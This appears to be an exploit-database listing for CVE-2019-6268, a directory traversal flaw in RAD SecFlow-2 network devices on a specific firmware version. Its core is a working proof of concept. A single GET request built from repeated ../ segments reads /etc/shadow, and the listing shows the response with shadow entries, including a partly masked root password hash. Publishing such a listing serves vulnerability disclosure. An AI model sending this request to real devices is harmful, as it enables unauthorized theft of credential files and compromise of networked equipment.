Lucene search

K
zdtBranko Milicevic1337DAY-ID-39418
HistoryMar 05, 2024 - 12:00 a.m.

RAD SecFlow-2 Path Traversal Vulnerability

2024-03-0500:00:00
Branko Milicevic
0day.today
98
rad secflow-2
path traversal
vulnerability
unauthorized access
sensitive files
cve-2019-6268
directory traversal
exploit.

7.4 High

AI Score

Confidence

Low

0.0004 Low

EPSS

Percentile

9.1%

RAD SecFlow-2 devices with Hardware 0202, Firmware 4.1.01.63, and U-Boot 2010.12 suffer from a directory traversal vulnerability.

# Exploit Title: Path traversal in RAD SecFlow-2 devices with Firmware 4.1.01.63
# CVE: CVE-2019-6268
# Exploit Author: Branko Milicevic

RAD SecFlow-2 devices with Hardware 0202, Firmware 4.1.01.63, and U-Boot 2010.12 allow URIs beginning with /.. for Directory Traversal, as demonstrated by reading /etc/shadow.

Steps to reproduce:

Request:
GET /../../../../../../../../../../etc/shadow HTTP/1.1

Response:
HTTP/1.1 200 OK

root:nDnjJ****ydh3:11851:0:99999:7:::
bin:*:11851:0:99999:7:::
daemon:*:11851:0:99999:7:::
adm:*:11851:0:99999:7:::
lp:*:11851:0:99999:7:::
sync:*:11851:0:99999:7:::
shutdown:*:11851:0:99999:7:::
Vulnerability Type
Directory Traversal

Attack Vectors
Unauthorized attacker can create a crafted request to obtain any file from the operating system (password hashes).

Reference
https://www.owasp.org/index.php/Path_Traversal

7.4 High

AI Score

Confidence

Low

0.0004 Low

EPSS

Percentile

9.1%

Related for 1337DAY-ID-39418